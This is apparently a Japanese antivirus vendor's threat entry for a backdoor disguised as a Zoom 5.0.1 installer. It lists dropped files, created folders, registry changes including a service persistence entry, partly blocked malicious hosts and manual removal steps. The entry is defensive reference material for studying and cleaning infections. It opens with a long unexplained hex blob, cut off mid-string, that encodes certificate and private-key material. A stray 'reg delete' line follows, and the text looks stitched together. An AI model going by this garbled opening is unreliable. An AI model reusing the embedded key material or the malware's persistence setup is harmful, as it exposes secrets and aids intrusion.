71643356776244426d55455261527a5678436d30724e6d745152314a5159566447546d314765556b344d554a554e45567965464a545744685061574a465669396a4c304e7863474a3257485a71647a4a7065576c4964334a755957567957553173596a6846646c634b5154685a5757355461334654576d4a4e656d70575655645555473149563356454d6b643054475a365630743161545235555770784e445646625764434d584a3253314a51646c5a49596c70734d6b5a56513070495a6770344e33564f5a6d4e544c31465553326c4e6448553165584a73566d49354f57466a5a5570535a46465a6332597a4e6d6f7652546c544b3038304d334654546e64534d564972566b4e4a56337057516e705357564e33436a4e4553457442535373356154646d59544d79536b784f52544e7164326c68625846424f4452534f474977523273354b793968646c6c76595442724c3064554e6d70565257705a614768344d4868434f5449725a456f4b5758466e633046594f574a45646e4d775a58647163304645596c6b785332524c517a6c7059585a4962304659636c513452324a73654777314f484a5665565a50616a4a74555863765a584e355a56644256566f336477707555556c4551564642516b31424d4564445533464855306c694d30525252554a44643156425154524a516b4652516d464257474672645846786145464562336475526a4e345131466c56554972617a466f527a4935436d565459697478616a5a4252584a4f6547704b62573170536a646c4f5759354e58525755466b72654864334e476b794b31684b574656484d6e5a4f525552344e57786d56305652623235335a7a51345657316154566b4b556c4e595230786e526d517954576c6e61464645526e68774f46683663557451575870565657784b553235586446567357445531626b347a536e707a4e53747757467061556d314b576b5a32536e52475a5339695241707a51315657654452614f4851324f554e524e5856314d307048596b4a7054573872516b343452575a456458424d534670716157744c516c46695532526e52576434643064304e53396d636d30314c32733457473934436b4e7864585a7156445a3155555a32513064755a4459334b3231495243397a5a586778627a4e554e58645156334e4b536c42725a3170484d306c695a30467756307047566e6c704f584a5556566c71654851785555634b654531434f5451355747566f4e446c6d576a525a54445577616a4e4f656d685a656b35474e6c5934625864424c326873576d3933563239504e30673364444e6d54325935523073765132594b4c5330744c533146546b51675130565356456c4753554e42564555744c5330744c516f3d3c2f63657274696669636174653e3c707269766174655f6b65793e4c5330744c5331435255644a54694251556b6c575156524649457446575330744c533074436b314a535556325a306c4351555242546b4a6e6133466f61326c484f586377516b465252555a4251564e44516b746e6432646e553274425a3056425157394a516b4652524555305932314f52564e51517a5a745746494b4f44684f61324a746357493363564534576b553563466c564d6c6c595357703656555a515a314e32526b5a4b5a6e6332536e4e5357446c364f457478624855355a5374515247464d53306c6d5133566b63445a305a777035566e5a33557a6c5a5248686f6157524c5533424b62484e36543035575556704e4b316c6b59545251575745776443394f575845325447704b51303979616d74545955464956335534634555724f56566b64473159436c6c575
  • reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.9800.1720" /f

(註:%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。. %Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Roaming" です。. %System%フォルダは、システムフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows\System32" です。.)

マルウェアは、以下のフォルダを作成します。

  • %Application Data%\Zoom\zoom_install_src
  • %Application Data%\Zoom\bin
  • %User Temp%\Zoom Meetings\5.0.1
  • %User Temp%\7zS8C40EAE9
  • %Application Data%\Zoom
  • %User Temp%\$inst
  • %Start Menu%\Programs\Zoom
  • %User Temp%\Zoom Meetings
  • %Application Data%\Zoom\uninstall
  • %Application Data%\Zoom\logs
  • %Application Data%\Zoom\data
  • %Application Data%\Zoom\reports

(註:%Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Roaming" です。. %User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。. %Start Menu%フォルダは、現在ログオンしているユーザのスタートメニューフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Windows\Start Menu" または "C:\Documents and Settings\<ユーザ名>\Start Menu" です。また、Windows Vista、7、8、8.1、2008(64-bit)、012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Roaming\Microsoft\Windows\Start Menu" です。)

他のシステム変更

マルウェアは、以下のファイルを削除します。

  • %Application Data%\Zoom\logs\zoo1A53.tmp
  • %Application Data%\Zoom\data\zoomus.db-journal
  • %Application Data%\Zoom\logs\zooDFC3.tmp
  • %Application Data%\Zoom\logs\zoo1F90.tmp
  • %Application Data%\Zoom\data\zoomus.tmp.db-journal

(註:%Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Roaming" です。)

マルウェアは、以下のレジストリ値を追加します。

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\
services\DNS-Service
FailureActions = "{random characters}"

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\
services\DNS-Service\Parameters\
AppExit
(Default) = "Restart"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\Zoom Meetings 5.0.1
DisplayName = "Zoom Meetings 5.0.1"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\Zoom Meetings 5.0.1
DisplayVersion = "5.0.1"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\Zoom Meetings 5.0.1
VersionMajor = "5"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\Zoom Meetings 5.0.1
VersionMinor = "0"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\Zoom Meetings 5.0.1
Publisher = "Zoom Video Communications, Inc."

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\Zoom Meetings 5.0.1
DisplayIcon = "%User Temp%\Zoom Video Communications, Inc.\Zoom Meetings\Uninstall.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\Zoom Meetings 5.0.1
UninstallString = "%User Temp%\Zoom Video Communications, Inc.\Zoom Meetings\Uninstall.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\Zoom Meetings 5.0.1
InstallLocation = "%User Temp%\Zoom Video Communications, Inc.\Zoom Meetings"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\Zoom Meetings 5.0.1
InstallSource = "%User Temp%"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\Zoom Meetings 5.0.1
InstallDate = "20200109"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\Zoom Meetings 5.0.1
Language = "1049"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\Zoom Meetings 5.0.1
EstimatedSize = "25026"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\Zoom Meetings 5.0.1
NoModify = "1"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\Zoom Meetings 5.0.1
NoRepair = "1"

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
ZoomUMX
DisplayIcon = "%Application Data%\Zoom\bin\Zoom.exe"

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
ZoomUMX
DisplayName = "Zoom"

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
ZoomUMX
DisplayVersion = "5.0"

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
ZoomUMX
EstimatedSize = "10000"

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
ZoomUMX
HelpLink = "https://support.{BLOCKED}m.us/home"

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
ZoomUMX
URLInfoAbout = "https://{BLOCKED}m.us"

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
ZoomUMX
URLUpdateInfo = "https://{BLOCKED}m.us"

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
ZoomUMX
Publisher = "Zoom Video Communications, Inc."

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
ZoomUMX
UninstallString = "%Application Data%\Zoom\uninstall\Installer.exe /uninstall"

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
ZoomUMX
InstallLocation = "%Application Data%\Zoom\bin"

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
ZoomUMX
NoModify = "1"

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Uninstall\
ZoomUMX
NoRepair = "1"

HKEY_CURRENT_USER\Software\MozillaPlugins\
@zoom.us/ZoomVideoPlugin
Version = "1"

HKEY_CURRENT_USER\Software\MozillaPlugins\
@zoom.us/ZoomVideoPlugin
Path = "%Application Data%\Zoom\bin\npzoomplugin.dll"

HKEY_CURRENT_USER\Software\MozillaPlugins\
@zoom.us/ZoomVideoPlugin
ProductName = "Zoom Video Plugin"

HKEY_CURRENT_USER\Software\MozillaPlugins\
@zoom.us/ZoomVideoPlugin
Description = "Zoom Video Plugin"

HKEY_CURRENT_USER\Software\MozillaPlugins\
@zoom.us/ZoomVideoPlugin
Vendor = "Zoom Video Communications, Inc."

HKEY_CURRENT_USER\Software\Classes\
.zoommtg
(Default) = "ZoomLauncher"

HKEY_CURRENT_USER\Software\Classes\
.zoommtg
Content Type = "application/x-zoommtg-launcher"

HKEY_CURRENT_USER\Software\Classes\
ZoomLauncher
(Default) = "Zoom Launcher - 3.0.1"

HKEY_CURRENT_USER\Software\Classes\
ZoomLauncher\shell\open\
command
(Default) = "%Application Data%\Zoom\bin\Zoom.exe --url=%1"

HKEY_CURRENT_USER\Software\Classes\
MIME\Database\Content Type\
application/x-zoommtg-launcher
Extension = ".zoommtg"

HKEY_CURRENT_USER\Software\Classes\
zoommtg
(Default) = "URL:Zoom Launcher"

HKEY_CURRENT_USER\Software\Classes\
zoommtg
URL Protocol = ""

HKEY_CURRENT_USER\Software\Classes\
zoommtg
UseOriginalUrlEncoding = "1"

HKEY_CURRENT_USER\Software\Classes\
zoommtg\DefaultIcon
(Default) = "%Application Data%\Zoom\bin\Zoom.exe,1"

HKEY_CURRENT_USER\Software\Classes\
zoommtg\shell\open\
command
(Default) = "%Application Data%\Zoom\bin\Zoom.exe --url=%1"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
explorer
GlobalAssocChangedCounter = "12"

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\
.gz
notification = "{random characters}"

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\
.gz
Security = "{random characters}"

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\
.gz
General = "{random characters}"

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\
.gz
Certificates = "{random characters}"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\installer 20.0.9800.1720
DisplayName = "installer 20.0.9800.1720"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\installer 20.0.9800.1720
DisplayVersion = "20.0.9800.1720"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\installer 20.0.9800.1720
VersionMajor = "20"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\installer 20.0.9800.1720
VersionMinor = "0"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\installer 20.0.9800.1720
Publisher = "Company Inc."

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\installer 20.0.9800.1720
DisplayIcon = "%User Temp%\Company Inc.\installer\Uninstall.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\installer 20.0.9800.1720
UninstallString = "%User Temp%\Company Inc.\installer\Uninstall.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\installer 20.0.9800.1720
InstallLocation = "%User Temp%\Company Inc.\installer"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\installer 20.0.9800.1720
InstallSource = "%Windows%\SysWOW64\drivers"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\installer 20.0.9800.1720
InstallDate = "20200109"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\installer 20.0.9800.1720
Language = "1049"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\installer 20.0.9800.1720
EstimatedSize = "1"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\installer 20.0.9800.1720
NoModify = "1"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
Uninstall\installer 20.0.9800.1720
NoRepair = "1"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
explorer
GlobalAssocChangedCounter = "13"

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\
Microsoft\Windows\CurrentVersion\
explorer
GlobalAssocChangedCounter = "14"

作成活動

マルウェアは、以下のファイルを作成します。

  • %Application Data%\Zoom\bin\util.dll
  • %Application Data%\Zoom\zoom_install_src\mcm.dll
  • %Application Data%\Zoom\bin\record_stop.pcm
  • %Application Data%\Zoom\zoom_install_src\leave.pcm
  • %Application Data%\Zoom\bin\leave.pcm
  • %Application Data%\Zoom\uninstall\Installer.exe
  • %Application Data%\Zoom\bin\zCrashReport.exe
  • %Application Data%\Zoom\zoom_install_src\asproxy.dll
  • %Application Data%\Zoom\bin\zTscoder.exe
  • %User Temp%\7zS8C40EAE9\Zoom.msi
  • %System%\drivers\libeay32.dll
  • %Application Data%\Zoom\zoom_install_src\zcacert.pem
  • %Application Data%\Zoom\data\zoomus.tmp.db
  • %Application Data%\Zoom\zoom_install_src\npzoomplugin.dll
  • %Application Data%\Zoom\bin\Zoom.exe
  • %Application Data%\Zoom\zoom_install_src\ring.pcm
  • %Application Data%\Zoom\bin\asproxy.dll
  • %System%\drivers\install.exe
  • %Application Data%\Zoom\zoom_install_src\zCrashReport.exe
  • %Application Data%\Zoom\zoom_install_src\reslib.dll
  • %Application Data%\Zoom\bin\record_start.pcm
  • %Application Data%\Zoom\zoom_install_src\dingdong1.pcm
  • %Application Data%\Zoom\bin\msaalib.dll
  • %Application Data%\Zoom\bin\zWebService.dll
  • %Application Data%\Zoom\bin\zcacert.pem
  • %Application Data%\Zoom\zoom_install_src\zChatUI.dll
  • %Application Data%\Zoom\bin\dingdong1.pcm
  • %Application Data%\Zoom\bin\turbojpeg.dll
  • %Application Data%\Zoom\zoom_install_src\zVideoUI.dll
  • %Application Data%\Zoom\zoom_install_src\zzhost.dll
  • %Application Data%\Zoom\bin\aomagent.dll
  • %Application Data%\Zoom\bin\meeting_raisehand_chime.pcm
  • %Application Data%\Zoom\bin\CptInstall.exe
  • %Application Data%\Zoom\zoom_install_src\zChatApp.dll
  • %Application Data%\Zoom\bin\Droplet.pcm
  • %Application Data%\Zoom\zoom_install_src\XmppDll.dll
  • %Application Data%\Zoom\bin\reslib.dll
  • %Application Data%\Zoom\bin\dingdong.pcm
  • %Start Menu%\Programs\Zoom\Start Zoom.lnk
  • %Application Data%\Zoom\installer.txt
  • %Application Data%\Zoom\zoom_install_src\tp.dll
  • %Start Menu%\Programs\Zoom\Uninstall Zoom.lnk
  • %Application Data%\Zoom\zoom_install_src\record_start.pcm
  • %Application Data%\Zoom\bin\CptService.exe
  • %Application Data%\Zoom\bin\zzhost.dll
  • %Application Data%\Zoom\bin\CmmBrowserEngine.dll
  • %Application Data%\Zoom\bin\XmppDll.dll
  • %Application Data%\Zoom\zoom_install_src\msaalib.dll
  • %Application Data%\Zoom\zoom_install_src\DuiLib.dll
  • %Application Data%\Zoom\zoom_install_src\nanosvg_LICENSE.txt
  • %Application Data%\Zoom\bin\zCrashReport.dll
  • %Application Data%\Zoom\zoom_install_src\meeting_chat_chime.pcm
  • %Application Data%\Zoom\zoom_install_src\CptControl.exe
  • %Application Data%\Zoom\bin\zChatApp.dll
  • %Application Data%\Zoom\zoom_install_src\libcrypto-1_1.dll
  • %Application Data%\Zoom\bin\crashrpt_lang.ini
  • %Application Data%\Zoom\zoom_install_src\zCrashReport.dll
  • %Application Data%\Zoom\bin\DuiLib.dll
  • %Application Data%\Zoom\data\Zoom.us.ini
  • %Application Data%\Zoom\zoom_install_src\ZoomInstall.xml
  • %User Temp%\Zoom Meetings\5.0.1\setup.exe
  • %User Temp%\101.ico
  • %Application Data%\Zoom\zoom_install_src\zVideoApp.dll
  • %Application Data%\Zoom\bin\CptShare.dll
  • %Application Data%\Zoom\data\client.config
  • %Application Data%\Zoom\zoom_install_src\zWebService.dll
  • %Application Data%\Zoom\zoom_install_src\CptService.exe
  • %Application Data%\Zoom\data\zoomus.db
  • %Application Data%\Zoom\bin\nanosvg_LICENSE.txt
  • %Application Data%\Zoom\bin\zAutoUpdate.dll
  • %Application Data%\Zoom\bin\libcrypto-1_1.dll
  • %Application Data%\Zoom\zoom_install_src\ssb_sdk.dll
  • %Application Data%\Zoom\zoom_install_src\libfaac.dll
  • %System%\drivers\ssleay32.dll
  • %Application Data%\Zoom\bin\viper.dll
  • %Application Data%\Zoom\bin\Cmmlib.dll
  • %Application Data%\Zoom\zoom_install_src\DllSafeCheck.dll
  • %Application Data%\Zoom\bin\npzoomplugin.dll
  • %Application Data%\Zoom\zoom_install_src\libssl-1_1.dll
  • %Application Data%\Zoom\zoom_install_src\CptHost.exe
  • %Application Data%\Zoom\bin\Zoom_launcher.exe
  • %Application Data%\Zoom\zoom_install_src\zAutoUpdate.dll
  • %Application Data%\Zoom\bin\duilib_license.txt
  • %User Temp%\CptShare.dll
  • %Application Data%\Zoom\bin\zData.dll
  • %Application Data%\Zoom\zoom_install_src\Installer.exe
  • %Application Data%\Zoom\bin\annoter.dll
  • %Application Data%\Zoom\zoom_install_src\zmb.dll
  • %Application Data%\Zoom\bin\zlt.dll
  • %Application Data%\Zoom\zoom_install_src\meeting_raisehand_chime.pcm
  • %Application Data%\Zoom\bin\zChatUI.dll
  • %Application Data%\Zoom\zoom_install_src\zlt.dll
  • %Application Data%\Zoom\bin\zWinRes.dll
  • %Application Data%\Zoom\zoom_install_src\CptShare.dll
  • %AppDataLocal%\GDIPFONTCACHEV1.DAT
  • %Application Data%\Zoom\zoom_install_src\duilib_license.txt
  • %Application Data%\Zoom\zoom_install_src\aomagent.dll
  • %Application Data%\Zoom\zoom_install_src\Zoom_launcher.exe
  • %Application Data%\Zoom\zoom_install_src\turbojpeg.dll
  • %Application Data%\Zoom\zoom_install_src\Droplet.pcm
  • %Application Data%\Zoom\bin\DllSafeCheck.dll
  • %Application Data%\Zoom\bin\ring.pcm
  • %Application Data%\Zoom\zoom_install_src\nydus.dll
  • %Application Data%\Zoom\bin\zVideoUI.dll
  • %Application Data%\Zoom\bin\nydus.dll
  • %User Temp%\Zoom Meetings\5.0.1\reg.exe
  • %Application Data%\Zoom\bin\zmb.dll
  • %Application Data%\Zoom\zoom_install_src\zWinRes.dll
  • %System%\drivers\svch\xc3\xaest.exe
  • %Application Data%\Zoom\zoom_install_src\CmmBrowserEngine.dll
  • %Application Data%\Zoom\bin\Installer.exe
  • %Application Data%\Zoom\zoom_install_src\record_stop.pcm
  • %Application Data%\Zoom\bin\ssb_sdk.dll
  • %Application Data%\Zoom\bin\libfaac.dll
  • %Application Data%\Zoom\bin\zVideoApp.dll
  • %Application Data%\Zoom\zoom_install_src\annoter.dll
  • %Application Data%\Zoom\zoom_install_src\dingdong.pcm
  • %Application Data%\Zoom\zoom_install_src\zTscoder.exe
  • %Application Data%\Zoom\bin\mcm.dll
  • %Application Data%\Zoom\bin\CptHost.exe
  • %Application Data%\Zoom\appsafecheck.txt
  • %Application Data%\Zoom\zoom_install_src\util.dll
  • %Application Data%\Zoom\zoom_install_src\zData.dll
  • %Application Data%\Zoom\zoom_install_src\Cmmlib.dll
  • %User Temp%\7zS8C40EAE9\Installer.exe
  • %Desktop%\Start Zoom.lnk
  • %Application Data%\Zoom\bin\directui_license.txt
  • %Application Data%\Zoom\zoom_install_src\directui_license.txt
  • %Application Data%\Zoom\bin\libssl-1_1.dll
  • %Application Data%\Zoom\zoom_install_src\crashrpt_lang.ini
  • %Application Data%\Zoom\zoom_install_src\viper.dll
  • %Application Data%\Zoom\zoom_install_src\CptInstall.exe
  • %Application Data%\Zoom\bin\meeting_chat_chime.pcm
  • %Application Data%\Zoom\bin\ZoomInstall.xml
  • %Application Data%\Zoom\zoom_install_src\Zoom.exe
  • %Application Data%\Zoom\bin\CptControl.exe
  • %Application Data%\Zoom\bin\tp.dll

(註:%Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Roaming" です。. %User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。. %System%フォルダは、システムフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows\System32" です。.. %Start Menu%フォルダは、現在ログオンしているユーザのスタートメニューフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Windows\Start Menu" または "C:\Documents and Settings\<ユーザ名>\Start Menu" です。また、Windows Vista、7、8、8.1、2008(64-bit)、012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Roaming\Microsoft\Windows\Start Menu" です。. %AppDataLocal%フォルダは、ローカルアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local" です。. %Desktop%フォルダは、現在ログオンしているユーザのデスクトップです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>\Desktop" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\Desktop" です。)

その他

マルウェアは、以下の不正なWebサイトにアクセスします。

  • http://{BLOCKED}m.us
  • {BLOCKED}.204.20
  • {BLOCKED}5.36.14

このウイルス情報は、自動解析システムにより作成されました。

  対応方法

対応検索エンジン: 9.850

手順 1

Windows XP、Windows Vista 、Windows 7、および Windows 10 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。

手順 2

「Backdoor.Win32.ZAPIZ.THDBABO」で検出したファイル名を確認し、そのファイルを終了します。

[ 詳細 ]

  • すべての実行中プロセスが、Windows のタスクマネージャに表示されない場合があります。この場合、"Process Explorer" などのツールを使用しマルウェアのファイルを終了してください。"Process Explorer" については、こちらをご参照下さい。
  • 検出ファイルが、Windows のタスクマネージャまたは "Process Explorer" に表示されるものの、削除できない場合があります。この場合、コンピュータをセーフモードで再起動してください。
    セーフモードについては、こちらをご参照下さい。
  • 検出ファイルがタスクマネージャ上で表示されない場合、次の手順にお進みください。

手順 3

このレジストリ値を削除します。

[ 詳細 ]

警告:レジストリはWindowsの構成情報が格納されているデータベースであり、レジストリの編集内容に問題があると、システムが正常に動作しなくなる場合があります。
レジストリの編集はお客様の責任で行っていただくようお願いいたします。弊社ではレジストリの編集による如何なる問題に対しても補償いたしかねます。
レジストリの編集前にこちらをご参照ください。

  • In HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DNS-Service
    • FailureActions = "{random characters}"
  • In HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DNS-Service\Parameters\AppExit
    • (Default) = "Restart"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Zoom Meetings 5.0.1
    • DisplayName = "Zoom Meetings 5.0.1"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Zoom Meetings 5.0.1
    • DisplayVersion = "5.0.1"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Zoom Meetings 5.0.1
    • VersionMajor = "5"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Zoom Meetings 5.0.1
    • VersionMinor = "0"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Zoom Meetings 5.0.1
    • Publisher = "Zoom Video Communications, Inc."
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Zoom Meetings 5.0.1
    • DisplayIcon = "%User Temp%\Zoom Video Communications, Inc.\Zoom Meetings\Uninstall.exe"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Zoom Meetings 5.0.1
    • UninstallString = "%User Temp%\Zoom Video Communications, Inc.\Zoom Meetings\Uninstall.exe"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Zoom Meetings 5.0.1
    • InstallLocation = "%User Temp%\Zoom Video Communications, Inc.\Zoom Meetings"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Zoom Meetings 5.0.1
    • InstallSource = "%User Temp%"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Zoom Meetings 5.0.1
    • InstallDate = "20200109"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Zoom Meetings 5.0.1
    • Language = "1049"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Zoom Meetings 5.0.1
    • EstimatedSize = "25026"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Zoom Meetings 5.0.1
    • NoModify = "1"
  • In HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Zoom Meetings 5.0.1
    • NoRepair = "1"
  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\ZoomUMX
    • DisplayIcon = "%Application Data%\Zoom\bin\Zoom.exe"
  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\ZoomUMX
    • DisplayName = "Zoom"
  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\ZoomUMX
    • DisplayVersion = "5.0"
